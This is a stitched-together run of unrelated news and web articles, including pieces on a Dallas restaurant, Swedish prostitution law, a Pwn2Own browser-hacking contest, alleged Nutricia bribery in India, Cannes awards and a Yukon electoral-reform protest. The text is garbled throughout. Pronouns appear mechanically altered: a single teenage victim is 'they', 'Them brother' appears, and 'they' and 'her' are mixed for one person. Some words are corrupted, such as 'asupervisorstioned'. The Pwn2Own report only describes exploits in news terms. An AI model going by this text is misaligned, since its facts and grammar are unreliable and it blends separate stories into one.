A peek inside the space , which is currently under construction , indicates that it will feature a mix of mid-century modern and industrial furnishings . A vibrant , rainbow-inspired palette adorns accent walls , and murals liven up the otherwise no-nonsense building . On-trend lighting fixtures , like a sea of mercury-dipped Edison bulbs , lend a contemporary feel .
As far as the food is concerned , the restaurant offerings can change daily and will include things like sandwiches , steak , seafood and more , all priced between $ 10 and $ 30 . Wine will be sold by the bottle , at price points ranging from totally affordable ( $ 15 ) to a weekend splurge ( $ 500 ) . The restaurant may “ borrow ” menus from eateries that have closed , and they 'll have guest chefs moonlight in the kitchen .
The restaurant will be led by Chef Bryan Chambers , who studied at the Culinary Institute of America and has worked in restaurants in Dallas and Washington D.C. , including a stint as chef de cuisine at the National Gallery of Art . At this restaurant , Chambers will be able to change up the menu daily , depending on the dishes they want to make and the ingredients that are available .
Segal plans to curate a diverse crowd of regulars by offering deep discounts to creatives , first-responders , nurses , and students , among others . “ I want people to walk out of here and say , ‘ I met this interesting person . ' It 's open to everybody , but we 're effectively curating with prices . ”
Check back for more details on when the restaurant at 1910 Pacific officially opens .
In Sweden it is legal to work as a prostitute , but it is illegal for customers to pay for sex . Police say the number of sex workers has dropped by two-thirds since the strategy was introduced fifteen years ago .
The Social Democrat-Green party coalition wants to extend the policy to Swedes who buy sex abroad , with a vote in parliament expected on Tuesday .
But their plans look set to be blocked by the centre-right parties that made up the former governing Alliance in Sweden and the nationalist Sweden Democrats .
`` For the Swedish police to scout abroad for this type of crime is not using their resources in the best way , '' Johan Pehrson , Liberal Party Justice spokesperson told Swedish television network SVT .
`` It is more important to combat serious sex crimes that exist in Sweden , particularly the crime of targeting children . ''
Richard Jomshof , speaking for the Sweden Democrats added :
`` We say no . Even if we are against buying sex in Sweden , it is not the same as interfering in other countries ' legislation . ''
Many opponents to the plan argue that it is wrong to punish someone for doing something that is legal in one nation , but not in another .
Some argue that making it illegal for Swedes to pay for sex in places where prostitution is still legal , could lead to other countries starting to punish their citizens for activities that are allowed in Sweden but banned elsewhere .
`` It would be terrible if people got punished because they had a homosexual relationship in Sweden , or if they were a woman seen to be 'improperly ' dressed or because they had had an abortion in Sweden , '' Moderate party Justice spokesperson Beatrice Ask told SVT .
Tim Miles buys 100 tickets to ensure Nebraska students get in free
Tim Miles is picking up the tab for 100 UNL students to get into Sunday 's Husker hoops game against Northwestern .
In order to get one of the free tickets , students are instructed to line up at the student entrance at Pinnacle Bank Arena ( south side next to the Husker Fan Shop ) when gates open at 11:45 a.m. on Sunday . A valid student ID must be shown to be eligible for the free tickets , and they will be distributed on a first-come , first-served basis .
The Huskers are off to their first 3-0 conference start in 41 years , and Miles wants PBA rocking when NU hosts the Wildcats .
Hey # UNL students , still need tickets for Sunday ?
Coach Miles has you covered .
? ? ? ? : https : //t.co/xysKOO1V8f pic.twitter.com/8KREvXT4UM — Nebraska Basketball ( @ HuskerHoops ) January 6 , 2017
via Nebraska athletics
Tag : Huskers
CBS/AP
( CBS/AP ) COLUMBUS , Ohio - An Ohio Amish man will serve 30 days in jail for firing a bullet into the air that inadvertently killed a 15-year-old girl driving a horse-drawn buggy more than a mile away , a prosecutor said Wednesday .
As part of an agreement with prosecutors , 28-year-old Marion Yoder pleaded guilty Tuesday to a misdemeanor count of negligent homicide , said Steve Knowling , the prosecutor for Holmes County in northern Ohio .
A judge sentenced Yoder to the maximum 180 days in the county jail , but suspended all but 30 days of the term . Yoder will be on probation for three years and will have to go back to jail for the full term if they violate it .
Authorities said Yoder was clearing a round out of their .50-caliber muzzle-loading rifle following a hunting trip when they fired a shot into the air . Rachel Yoder was driving the buggy more than a mile away , coming home from a Christmas party southwest of Canton when they were struck by the round . The two are not related .
`` It 's kind of a cautionary tale , '' Knowling said . `` You fire into the air , and it 's got to come down somewhere . ''
Marion Yoder initially was charged with felony reckless homicide .
`` The victim 's family did not want to proceed with this as a felony , and given the circumstances of the case I took that into consideration , '' Knowling said . `` I think it 's a fair resolution to the case and brings closure to both sides . ''
Rachel Yoder was shot around 10 p.m. on Dec. 15 , 2011 , about three miles from their home . Police said the horse carted their home and they fell out of the buggy . Them brother noticed the horse and buggy going in a circle and found the unresponsive teen on the ground . They died a day later .
Authorities thought they may have fallen from the buggy and hit their head , but an autopsy report concluded they died of a gunshot wound to the head and ruled their death a homicide .
Marion Yoder has to report to jail on Friday . Other terms of their probation include forfeiting the rifle and taking a hunter-safety course .
To many , a pet is n't “ just a dog ” or “ just a cat. ” People share deep bonds with their animals , and when one dies , the experience can be devastating .
Fortunately , a few companies are beginning to take this loss more seriously .
CBS Miami reports that some companies are now offering “ pet bereavement days , ” or paid time off , so that employees can process the death of their pet , regroup and begin to heal .
“ Chief was the best dog ever , ” Erica Lee , whose pup recently died , told CBS . “ He was very sweet , loving . I was heartbroken . ”
Luckily , the company Lee works for offered a paid pet bereavement day so that they could stay home , grieve and explain the loss to their young son .
Companies that provide this tail-wagging benefit include Maxwell Health , pet insurance provider Trupanion and software company VM Ware , which does n't offer a formal pet bereavement policy , but offers flexible time off for this purpose . Fortune also reports that the San Francisco-based restaurant and hotel group , Kimpton , has been offering its employees perks like pet insurance , bereavement and onsite amenities like water bowls , treats , beds and toys since 1981 .
Unfortunately , the idea is still pretty novel and many companies do not offer this pet bereavement . But the Humane Society offers tons of advice on how to deal with this kind of loss -- like preparing a memorial for your pet or reaching out to your vet and asking if they know about any post-loss support groups .
Online communities like the Association for Pet Loss and Bereavement also provides information about support groups by each state .
As for Lee , they are grateful they had time to mourn Chief and that they work for a company that supported her , telling CBS :
“ [ Pet bereavement ] should absolutely be the norm for many businesses , if not all . ”
On Friday mornings , volunteer Igor Bjelac pulls up to the loading area behind the Sapperton Save-On Foods to pick up a healthy load of less-than-perfect produce .
That fresh food will make its way to meal programs from New Westminster to Vancouver , including Aunt Leah 's and the Union Gospel Mission , organized by an expanding social enterprise called Refood .
On Mondays , Bjelac helps distribute food to 40 refugee families at the Immigrant Link Centre . As a recent immigrant from Russia , Bjelac knows that Canada is a steep learning curve .
“ But while they learn how to get jobs and speak English , they never have to worry about going hungry , ” they said .
The food-donation collaboration with the Immigrant Link Centre represents just a fraction of what Refood has been able to accomplish in the last two years .
In fact , Refood helps feed about 2,500 people a day with food that otherwise would have been thrown away .
“ We help a lot of low-income refugees , ” Bjelac said . “ When they save that money they would have spent in food , they can buy shoes and clothes . It 's very helpful to them as they get started . ”
The centre also collects food and helps with distribution to other organizations , including a First Nations school and meal programs on the Downtown Eastside .
Refood is the organization at the heart of the community 's effort to leverage food that would otherwise be wasted .
Founder Danison Buan 's goals are three-fold : Reduce food waste , feed the hungry and educate youth .
“ I started Refood two years ago after I submitted the idea to ONE Prize and it was successful , ” they said . ONE Prize — which includes a $ 2,000 grant — is sponsored by Donald 's Market and River Market in New Westminster .
“ At first I had no grocery stores on board , but we started to work with Donald 's Market after winning the competition ; after that we got one Save-On Foods store as well , ” they said .
Since the ONE Prize win in 2015 , Refood has become something of a darling in the social enterprise community , winning VanCity 's Best Pitch contest and the Coast Capital Venture Prize Social Impact Award . Their collaborator Schannel Siregar also scooped the Tammy Moyer Women of Worth Award for Sustainable Living .
“ Right now we are scaling up , because we have added more Save-On Foods stores , PriceSmart , Unfi Canada , ” they said . “ At first we were just in New West , but now we work in Vancouver , Burnaby and Richmond as well . We have nine food sources now . ”
Volunteers pick up food donations — fresh food too ugly for perfection-obsessed customers — two to three times a week from each store .
Besides Immigrant Link Centre , their recipient organizations include Dixon Transition House , Vancouver Outreach , Union Gospel Mission , St. Barnabas Church , Lookout Society , Aunt Leah 's Place and others .
“ By providing them with food , we allow these organizations to divert money from their food services to other uses and strengthen their programming , ” they said .
What makes Refood work is attention to logistics .
“ What each organization gets and on what days are carefully curated , so they know what to expect , ” they said . “ Nothing is random ; the food and the timing have to be consistent . ”
Although the organization is structurally a charity — its registration is pending — Buan is developing revenue streams to buy equipment and to compensate volunteers for their expenses . One such scheme allows people who donate $ 50 to $ 100 to get their taxes professionally prepared for free .
The most pressing need at the moment is a refrigerated truck to transport perishable foods . Volunteers are hauling food in personal vehicles , none bigger than an SUV . In practical terms , that means they have to distribute what they pick up in less than an hour .
The truck is essential to support the rapid expansion of the service , they said .
rshore @ postmedia.com
twitter.com/theGreenManblog
Related
CLICK HERE to report a typo .
Is there more to this story ? We 'd like to hear from you about this or any other stories you think we should know about . Email vantips @ postmedia.com .
As of Oct. 15 , the University of California will begin cutting perks for senior-level officials systemwide in an effort to reduce costs .
The policy changes were made in response to an April 2017 state audit of the UC system that found the UC Office of the President 's executive and administrative salaries to be “ significantly higher ” than those of comparable state employees . The new policies will reduce reimbursements for officials traveling on UC-related business , potentially eliminate supplemental retirement contributions for senior management level officials and limit reimbursements for costs related to employee relocation , according to a UC press release .
“ These policy changes are consistent with UC 's commitment to public accountability , transparency and continuous improvement , ” said UC spokesperson Claire Doan in an email .
According to the audit , the UC Office of the President spent at least $ 21.6 million on “ generous ” employee benefits over five years , including $ 2.5 million on retirement savings accounts for executives and more than $ 2 million on business meeting and entertainment expenses .
In addition to cutting reimbursement expenses , the UC will revise its cell phone policy . UC-issued cell phones and tablets will only be given to those whose position requires remote or nonbusiness hours access .
Doan stated in an email that savings from this policy change will be quantified by April 2019 , citing a need for time to gather data .
The UCOP Audit Implementation Plan , which outlines the university 's progress in meeting audit recommendations , states that the UC is expected to adjust its reimbursement policies to definitively meet established targets by April 2020 . If these adjustments result in savings , the UC is then required to reallocate surplus funds to campuses .
In the implementation plan , the UC has grouped its 33 goals into 10 “ workstreams , ” or overarching areas of focus . Among the workstreams that have been listed as “ analysis underway ” are setting targets for UCOP employee and leadership salary ranges , revisiting reimbursement policies , implementing staffing plans and establishing policies regarding UCOP reserves . The April 2017 audit criticized UCOP for not disclosing $ 175 million in budget reserve funds to the public .
Increasing transparency regarding the UCOP budget process has been “ partially implemented , ” according to the UCOP Audit Implementation Plan .
Rafi Sands , student adviser to the UC regents , said they found it commendable that the UC has addressed budgetary issues in a timely fashion , but they added that they believed the new policy changes were not enough to solve the UC 's financial crisis .
“ ( These cuts ) never could add up to save us from tuition hikes or help us to not have to cut classes or seek outside donors , ” Sands said .
Sands also said that while it is important to acknowledge that the university is addressing issues of financial accountability , the UC 's focus should be on public education as a whole .
“ Let 's focus on what the main issues are going on here : systematic disinvestment in public higher education , ” Sands said .
Revati Thatte is the lead higher education reporter . Contact them at [ email protected ] and follow them on Twitter at @ revati_thatte .
Over the past two days at the Pwn2Own contest , hackers have taken home $ 850,000 in prize money for exploits that broke all major browsers and the plugin for Adobe Flash .
Expect patches soon for Internet Explorer , Firefox , Chrome , Safari , and Adobe Flash for flaws that could have found their way to intelligence agencies and will likely still find their way to exploit kits aimed at anyone careless enough not to install the next patch .
The biggest winner from this year 's annual hacking contest by HP Tipping Point 's Zero Day Initiative ( ZDI ) was French security firm Vupen , which took home $ 400,000 for five exploits . Vupen is one of a handful of companies that actively markets exploits to intelligence agencies and law enforcement for lawful intercept use .
Vupen 's attack on Adobe Flash bypassed the IE sandbox to gain code execution , landing it $ 75,000 . It achieved the same result using a heap overflow and PDF sandbox escape in Adobe Reader , which secured it a further $ 75,000 . While the company , headed up Chaouki Bekrar , spent two months preparing for the contest , the two exploits netted it $ 150,000 within two hours on Wednesday .
Vupen then toppled IE with `` a use-after-free causing object confusion in the broker , resulting in sandbox bypass '' , giving it a further $ 100,000 on Wednesday , which it followed up with a $ 100,000 exploit for a flaw affecting Blink and Webkit in Chrome and a $ 50,000 attack for Firefox . Both resulted in code execution .
The company also had an exploit for Oracle 's Java and Apple 's Safari , but withdrew them from the competition .
PlayStation modder and one-time Apple employee , George Hotz , used an flaw in Firefox to achieve `` out-of-bound read/write resulting in code execution '' , which landed them $ 50,000 .
Others that won cash prizes for their attacks included Liang Chen , who won $ 65,000 for a heap overflow along with a sandbox bypass , resulting in code execution in Safari . Chen also collaborated with Zeguang Zhao of Team509 to take a further $ 75,000 for a heap overflow with a sandbox bypass , resulting in code execution in Flash .
In total , the contestants won $ 850,000 of an available pool of $ 1,085,000 . A $ 32,000 prize won by Google and a $ 50,000 exploit from researchers with the ZDI were donated to the Canadian Red Cross .
As ZDI points out in an accompanying infographic , security researchers have a few channels to choose from once they find a flaw . They can simply sell them to third party vendors , such as ZDI , which reports them to vendors , enter hacking contests like Pwn2Own or Google 's Pwnium , report them under a company 's bug bounty rules , sell them to a broker , sell them to the highest bidder , or opt for full disclosure .
More on browsers
Event Description
The Connecticut Chapter of Girls Pint Out is excited to celebrate our upcoming First Birthday at J. Timothy 's Taverne on Sunday , August 23 from 2pm-5pm . Please join us for an exciting afternoon to celebrate our first year as part of Connecticut 's craft beer community , while raising funds to support CT-based nonprofit Running for Rescues !
Attendees will enjoy scrumptious food at a variety of stations including J. Timothy 's famous dirt style wings , a prize drawing , a photo booth , local breweries on private tap , and special edition GPO swag . It promises to be a spectacular event !
Price : $ 45 pp tax and tip is included . Included in price is food , 2 beer tickets , CT Girls Pint Out swag , and the donation to Running for Rescues . For more information , please visit www.runningforrescues.org
Designated Charity : Running For Rescues is a CT-based 501 ( c ) ( 3 ) organization centered around helping homeless pets receive the care & attention they need .
Additional charities : Donations from the prize drawing will be given to The Sexual Assault Crisis Center of Eastern Connecticut and money raised from the photo booth will be donated to the Connecticut Humane Society . Additionally , any sales from beer sold in the private room will be given back to CT Girls Pint Out to ensure that we can keep offering YOU amazing experiences in the craft beer community .
Questions ? Do you want to help ? Visit www.facebook.com/ctgpo or email [ email protected ]
Nutricia India documents obtained by DairyReporter.com detail cash payments of around 15,000 Indian Rupees ( $ 240 , €180 ) – three times the average monthly salary in India - by Nutricia sales representatives to doctors .
A source close to the company told DairyReporter.com that Nutricia India 's finance department approved “ direct and indirect ” ​payments to doctors by sales representatives from Nutricia India 's baby nutrition division .
Executives at Danone Group HQ in Paris , including CEO Franck Riboud and CFO Pierre Andre Terisse , were made aware for the first time in July 2013 that illegal payments were allegedly being made by Nutricia India employees .
In a statement , Danone declined to comment on the allegations , but said that the company has a “ clear and well-established set of business conduct policies. ” ​
“ Worth 10,000 Rupees per month ” ​
In July 2012 , Indian firm Wockhardt completed the sale of its nutrition business to the Danone Group for €250m ( $ 182m ) . Through the deal , Nutricia India acquired Wockhardt 's Dexolac , Nusobee , and Protinex brands - marking its entry into the Indian baby nutrition market .
It became apparent during the handover period , in the second half of 2012 , that payments - in gift and cash form - were being made to doctors , our source said .
One internal Nutricia “ activity proposal ” , ​ dated November 2012 , appears to detail the purchase of iron chairs to fill the waiting room of a “ doctor worth 10,000 Rupees per month ” ​ in prescriptions .
Flights were bought for another doctor 's partner , induction cookers were commonly given as gifts , and “ stacks ” ​ of demand drafts were distributed to doctors during religious festival Diwali , our source added .
These practices , according to our source , were seen by employees as “ just the way that business is done in India. ” ​
Punishable by jail​
The Indian Infant Milk Substitutes , Feeding Bottles and Infant Foods Act 1992 ( IMS Act ) ​ expressly forbids the payment of health officials by those involved in the supply of infant formula .
“ No person who produces supplies , distributes or sells infant milk substitutes… . shall offer to give , directly or indirectly , any financial inducements or gifts to a health worker or to any member of their family for the purpose of promoting the use of such substitutes , ” ​ the IMS Act reads .
It also states that “ every person who , at the time the offence was committed , was in charge of , and was responsible to , the company , as well as the company shall be deemed to be guilty of the offence. ” ​
Violating the IMS Act is punishable by up to three years in prison and/or a fine of up to 5,000 Indian Rupees .
DairyReporter.com understands that the Indian authorities are not aware of the asupervisorstioned allegations .
Business conduct policies​
Responding , the Danone Group declined to comment directly on the allegations .
“ Danone has a clear and well-established set of business conduct policies , ” ​ Danone told DairyReporter.com . “ All our employees are expected to comply with these policies , as well as local laws , without exception , in all countries where we do business. ” ​
“ Our Indian medical and early life nutrition businesses were acquired in mid-2012 from a reputable Indian company , Wockhardt Group . Since the acquisition , we have taken steps to align the organisation with our internal policies , and conducted audits to verify compliance , as part of the normal integration of these businesses into our global portfolio. ” ​
“ We have no further comment at this time , ” ​the company added .
Homepage Picture : Stockmonkeys.com/Flickr
To do the experiment , you will need :
Slice of cheap white bread
How to do the experiment :
1 - Take half a slice of bread and chew it and chew it and chew it ! Even if the bread becomes disgusting , you should still keep chewing amd remember - do n't swallow or you 'll spoil the experiment !
2 - Pay attention to how the flavour of the bread changes .
3 - Once you think you have the answer , you can swallow the bready mush or ( this is probably best ! ) spit it out .
What 's going on ?
As you chew the bread , you may have noticed that it slowly tastes sweeter . Why ?
Bread is made up of starch and starch is made by plants . But how do plants make starch in the first place ?
When plants take in light , they convert it into sugars through a process called photosynthesis . Once the sugar is made , they need to store it in their cells . The problem is that when there is a lot of sugar in a cell , the proportion of water in that cell is less relative to a cell with hardly any sugar in it . If there are some cells with a lower water concentration ( or more sugar ) than others , then a concentration gradient is established . This can be thought of as a slope : at the top of the slope are cells with lots of water ( and little sugar ) and at the bottom of the slope are cells with relatively little water ( and lots of sugar ) .
If you put lots of water at the top of a slope , then it will trickle down to the bottom . This is exactly what happens in cells : the cells with a high concentration of water have some of their water sucked out and it is taken up by the cells with a low concentration of water . This continues until all the cells have an equal concentration of water and the gradient ( or slope ) disappears . This process of water moving between cells depending on the concentration of other small molecules ( such as sugar ) is called osmosis .
So what 's the problem ? Well plant cells are surrounded by a tough cell wall made of cellulose , and this gives the cell strength . However , if the cell is full of sugar from photosynthesis and water from other cells rushes in by osmosis , then the cell wall starts to strain . If too much water enters the cell , the cell wall will eventually give way and explode - just like a balloon that 's been blown one puff too far .
Exploded ( and thus dead ) cells are bad news for plants , so they 've had to come up with a cunning storage solution . What they do is take all the sugar molecules and glue them together into a long chain . It is this chain of sugar molecules that we call starch . Because starch is a long molecule , it does n't alter the overall water concentration ( or osmotic pressure ) of the cell like small sugar molecules do . This means that having starch in the cell does n't establish a large concentration gradient , does n't cause water to rush in , and the cells do n't explode .
When we use plants to make food such as bread , it is still in its starchy ( or long chain carbohydrate ) form . This is great , but we ca n't absorb it into our bodies in this long chain form . The only way round it is to chop it up . Thanks to evolution , there 's an enzyme in our spit called amylase which specifically cuts up starch and turns it back into small sugar molecules . This is why the bread starts to taste sweet after lots of chewing - the amylase enzyme is breaking down the starch and turning it into glucose .
Amylase is n't the only enzyme to break down food into molecules we can absorb . Another example is the enzyme lactase . This breaks down lactose ( which we ca n't absorb ) into galactose and glucose ( which we can ) . People who stop producing lactase will stop breaking down lactose , meaning that lactose is left behind in the gut . Bacteria that live in the gut see this otherwise ignored lactose and begin to break it down themselves . This produces large quantities of gas , and explains why people with lactose intolerance find that they become rather windy after a glass of milk . The lactose is acting as the fuel for a large bacterial fermentation plant !
Welcome back to the Sunday giveaway , where we give away a new Android phone or tablet each and every Sunday !
This week we are giving away a brand-new Honor 6X !
Honor has been making quite a stir ever since CES with their commitment to unlocked devices as well as serving up flagship specs at prices that do n't break the bank . The Honor 6X has been making waves for being an impressive mid-ranger that can last for two full days on one charge .
Honor is n't quite a household name just yet , but the Huawei-backed brand is certainly making a push for the US market in 2017 . If you want to know more about this line , check out our previous coverage :
With the Honor 6X , you 're getting some surprisingly high-end specs packed into a sleek design and a gorgeous , narrow-bezel display . If you 're ready to get your hands on one , see all the ways you can enter below !
Enter Giveaway
Honor 6X International Giveaway
More Giveaways
Winners Gallery
The giveaway is an international giveaway ( Except when we can not ship to your Country . )
If we can not ship to your country , you will be compensated with an online gift card of equal MSRP value to the prize .
We are not responsible for lost shipments .
We are not responsible if your giveaway prize malfunctions .
You must be aged of majority in your Country of residence .
We are not responsible for any duties or import fees that you may incur .
Only 1 entry per person , do not enter multiple email addresses . We will verify all winners and if we detect multiple email addresses by the same person you will not be eligible to win .
We reserve all rights to make any changes to this giveaway .
This giveaway is operated by AndroidAuthority .
The prize will ship when it is available to purchase .
Good luck . everyone !
Sofia Coppola won the award for best director at the Cannes Film Festival yesterday for their new film , The Beguiled , a remake of the 1971 Clint Eastwood film of the same name .
This makes them the second woman in the festival 's 71-year history to take home that prize . The last was Russian director Yuliya Solntseva in 1961 , who won for their dramatic retelling of grassroots resistance to the Nazi movement in the Soviet Union , Chronicle of Flaming Years .
In their acceptance speech , Coppola reportedly thanked Jane Campion , the Top of the Lake creator and Bright Star director who is still the only woman in the festival 's history to win the Palme d'Or . They won in 1993 for The Piano , which also netted them an Academy Award for Best Original Screenplay .
The win is significant for women filmmakers , and for Coppola personally , whose last competition film at Cannes , the Kirsten Dunst-starring Marie Antoinette , was booed . Now that it has honored two women directors , Cannes is officially ahead of the Oscars , which has honored only one ( Katheryn Bigelow in 2009 ) .
There were other bright spots for women during the festival this year . Nicole Kidman won a specially created 70th-anniversary prize , honoring their performances in four films that debuted at the festival — The Beguiled , Campion 's Top of the Lake : China Girl , Yorgos Lanthimos ' Killing of a Sacred Deer , and John Cameron Mitchell 's How To Talk To Girls At Parties . Lynne Ramsay , best known for their 2011 Tilda Swinton-fronted film We Need to Talk About Kevin , tied with Lanthimos for the award for best screenplay . They took home the honor for You Were Never Really Here , a crime drama starring Joaquin Phoenix , and a surprise hit that closed out the festival with a seven-minute standing ovation .
Coppola 's Civil War drama stars Nicole Kidman , Colin Farrell , Kirsten Dunst , and Elle Fanning , and though the screenplay is adapted from the same Thomas P. Cullinan novel as the Eastwood film , the Coppola treatment has been billed as a more explicit female empowerment story . The Beguiled will be released in the US on June 23rd .
Arsène Wenger says that clubs who break European football 's financial fair play regulations ought to be kicked out of the Champions League as Manchester City and Paris Saint-Germain prepared to hear the confirmation of their punishments for over-spending .
The Arsenal manager , who has long campaigned for balanced accounting in the game , admitted that the rules were so complicated that even they did not fully understand them . They called for clearer sanctions against those who did transgress and added that this would come down to bans from club football 's most glamorous competition .
`` I think the punishment is sophisticated , '' Wenger said . `` I would like a more simple one that makes more sense , although they have studied that for a very long time certainly to be in accordance with the legal side of it .
`` You would think that you accept the rules and you 're in the competition or you do n't accept the rules and you 're not in the competition . Then , everybody would understand it . ''
City and PSG have exceeded the permitted losses of €45m ( £37m ) over the 2011-12 and 2012-13 seasons and the governing body has proposed fines for each club of €60m , together with restrictions on their expensively assembled squads for the Champions League , reducing the number of players they can use in the tournament next season .
Uefa has set the deadline of Friday for the cases to be settled , appeal processes notwithstanding . City are extremely upset and are considering whether to appeal , whereas PSG are not expected to do so . City argue that the ability to write off the value of contracts signed before 2010 when the rules were unveiled , as well as to write down investments in youth development and infrastructure , has allowed them to narrowly comply . The squad restrictions are the sophisticated punishment to which Wenger refers . In them , Uefa would assess player wage bills and peg the clubs back in relation to the overspend . It effectively means that managers would not be able to select a proportion of their squad for the Champions League .
`` There are rules and you respect them or you do n't respect them , '' Wenger added . `` If you do n't respect them , you have to be punished . When Uefa does n't want to kick the clubs out of the Champions League , they have to find a more subtle punishment .
`` To me , and all of us on the outside , it looks a complicated punishment . Nobody understands , really . Today people are informed . We live in a society where everyone is informed . The rules have to be clear so that you can inform people well .
`` But if I go out in the street now and I ask a hundred people what you think of the fair play punishment , how many do you think can explain it to you ? I 'm in the job and I can not do it . They have to clarify the punishment . We all agree that if we do n't respect the rules you have to be punished . But to explain to people how that works is very difficult . ''
City need only a point at home to West Ham United on Sunday to secure the Premier League title , while PSG have been confirmed as the champions of France . It was put to Wenger that it seemed odd that two clubs could win their leagues yet be punished at the same time .
`` Of course , there is something wrong , '' Wenger said . `` I plead that for years . There are two ways of thinking about the whole process . You can say : 'We do n't care , we want the billionaires to buy the big players , they spend what they want . ' Or , you say : 'We want to keep things fair . '
`` If you say to me tomorrow : 'We give everybody £100m in the 20 Premier League clubs , ' I am OK . I 'll take the gamble . You can start what is a fair competition . It is a bit like how it works in the States , which is the most capitalistic country . They have a more even field of competition . That 's a basic question you have to answer in England . Do we let it go and everyone spends what they want ? ''
A Rhode Island schools superintendent has ended the district 's father-daughter dances and mother-son ballgames to comply with a state gender discrimination law , prompting some to complain that the move is an example of political correctness gone awry .
Cranston Mayor Allan Fung said Tuesday they were `` utterly disappointed '' that the Cranston schools superintendent nixed the events in what the mayor called `` the name of political correctness '' after the state affiliate of the American Civil Liberties Union complained last spring .
The ACLU complaint in May came on behalf of a single mother whose daughter had no father in their life but was precluded from attending the father-daughter dance , ACLU Executive Director Steven Brown said Tuesday .
In a letter to school organizations last month , Schools Superintendent Judith Lundsten said that district attorneys reviewing the complaint found that , while federal gender discrimination laws exempt such events , Rhode Island law does not .
`` I acknowledge that many of these events have long traditions and for many parents , these types of gender-based events are not an issue , '' Lundsten wrote . `` However , this is a public school system and under no circumstances should we be isolating any child from full participation in school activities and events based on gender . Please be all-inclusive when planning your events . ''
A message left Tuesday for Lundsten was not immediately returned .
Brown told The Associated Press that gender-specific events are not appropriate and commended the school system for banning them . They also noted that the Cranston events play to gender stereotypes -- dances for girls and baseball games for boys .
`` Not every girl today is interested in growing up to be Cinderella -- not even in Cranston , '' Brown said in a statement later . `` In fact , one of them might make a great major league baseball player someday . ''
On Monday , Sean Gately , a Republican running for state Senate , criticized the district decision , calling gender-based events , including the mother-son baseball games , important traditions . Gately 's political opponent , Democrat Frank Lombardi , is a school committee member .
Gately on Tuesday said their wife was looking forward to taking their 7-year-old son to the sporting event . They called the superintendent 's decision `` complete political correctness run amok '' and said they are seeking a legislative fix .
A message left for Lombardi was not immediately returned .
The city 's mayor said they have been flooded with calls from angry parents about the ban , and is urging the school committee to review the decision .
School Committee Member Andrea Iannazzi said the committee will consider at a Monday meeting a resolution to seek changes to state law that would allow the events .
Earlier this year , Cranston also was the site of an emotionally charged , months-long battle over a prayer banner at a local high school . The banner was ruled unconstitutional and ordered removed by a federal judge after a lawsuit was filed by the ACLU on behalf of a student-atheist at the school .
SHATTERED HEARTS ON VALENTINE 'S DAY – Yukoners expecting Prime Minister Justin Trudeau would keep their 2015 promise to reform Canada 's electoral system protest Tuesday afternoon outside Yukon MP Larry Bagnell 's constituency office . The MP was not on hand .
Yukoners protest Liberals ' broken promise Roses are red , violets are blue , these protesters say that Trudeau lied to you . By Sidney Cohen on February 15 , 2017
Roses are red , violets are blue , these protesters say that Trudeau lied to you .
On an unseasonably warm Valentine 's Day , dozens of disheartened Yukoners gathered outside Yukon MP Larry Bagnell 's office on Black Street to voice their displeasure over Prime Minister Justin Trudeau 's decision to abandon electoral reform .
Tuesday 's demonstration , organized by Lead Now Yukon , followed similar protests across the country last Saturday .
Protesters charged Trudeau with breaking the hearts of Canadians by going against their word .
Speakers , including Gerald Haase , the federal Green Party 's Yukon riding president , called for a system of proportional representation – “ one that fosters inclusion and greater consensus . ”
Trudeau campaigned on the promise that 2015 would be the last year an election would be decided using first-past-the-post .
Months of consultations followed with experts and the public through government-led town halls , community gatherings and an online survey . After that , Trudeau concluded that no particular voting system had emerged as the popular choice , and that a referendum “ would not be in Canada 's best interest . ”
In their mandate to Karina Gould , the new minister of Democratic Institutions who was appointed last month , Trudeau wrote , “ Changing the electoral system will not be in your mandate . ”
Lead Now Yukon member Julia Duchesne said they felt “ extreme disappointment ” to learn Trudeau is scrapping electoral reform .
Though they are n't shocked by their apparent change of heart , they said the prime minister ca n't expect to get away with breaking this key campaign pledge .
In Iqualuit last week , Trudeau suggested that a system of proportional representation would allow “ fringe voices ” to “ hold the balance of power ” in the House of Commons .
In Duchesne 's view , Trudeau was playing on Canadians ' unease over “ extremist ” and “ alt-politics ” – the kind of rhetoric that has come to define the U.S. Trump administration , that permeated Brexit , and inspired far-right movements in France and Germany .
“ It 's fear mongering , ” they said .
“ From a centrist , moderate party like the Liberals , we 're always going to hear that fringe parties are dangerous , but I do n't consider the Green Party to be a dangerous fringe party . ”
Duchesne believes Canada is low-risk for the ascendancy of extremism .
“ I do n't think it 's a danger in Canada and it 's worth it to balance out the power in parliament a little bit more , ” they said .
Erik Miller , another protester , said they want fringe voices in Parliament .
“ Far-right voices are already in the House of Commons , ” they said .
“ We need to see Green voices beyond just Elizabeth ( May ) . We need to see more orange voices , we need to see people voicing dissent , raising issues that are n't being raised . ”
They predicted Trudeau would abandon electoral reform the moment a Liberal majority was called on election night in October 2015 .
A lot of Canadians voted Liberal because the party echoed the NDP 's promise to reform the voting system , said Miller , and they were afraid of another Stephen Harper mandate .
They are in favour of a referendum on how voting happens in Canada .
One argument against a referendum is that not enough Canadians are engaged in the issue of electoral reform to draw significant voter turnout .
Prince Edward Island 's non-binding plebiscite on changing the province 's first-past-the-post voting system yielded a low turnout – 36 per cent .
By contrast , 85.9 per cent of registered voters cast ballots in the province 's 2015 general election .
While more than 52 per cent of the plebiscite votes were in favour of a mixed-member proportional representation system , P.E.I . Premier Wade MacLauchlan said there was not a strong enough showing of support at the polls to commit to a voting system change .
Rejecting a referendum on the presumption that Canadian 's wo n't get out and vote , “ does n't give enough credit to Canadians , ” said Miller .
“ With the way this year is going , people are reading a lot , people are willing to learn , we 've got more access to media than we 've had ever in history and I think Canadians can make an informed decision . ”
Maintaining the status quo is a “ betrayal and an insult ” to the experts and citizens who participated in consultations on electoral reform , said Jason LaChappelle , who helped organize Tuesday 's demonstration .
LaChappelle is not in favour of a referendum .
“ It 's a fairly divisive thing , ” they said .
Canadians elected the Liberals based , in part , on the promise of electoral reform , they said . Couple that with the cross-Canada consultations and there should be a sufficient indication of what citizens want .
Bagnell , who apologized in the press to Yukoners hoping for electoral reform , was out of town during Tuesday 's demonstration .
However Susan Moorhead Mooney , their constituency office manager , was outside , handing out donuts on their behalf .
“ He 's sorry he 's not here , ” they said .
Marvel announced what Bleeding Cool readers knew for a month , that Peter David and Mark Bagley were creating a new Scarlet Spider series starring Ben Reilly . But what did the internet think of their new look ?
Ben Reilly revealing their new costume like
( Sorry @ DanSlott , I love you for bringing them back , but that is AWFUL ) pic.twitter.com/1s4ZxP4uo3 — Blankie Jen ( @ JenInRGB ) January 9 , 2017
https : //twitter.com/TeejTurtle/status/818556036357509120
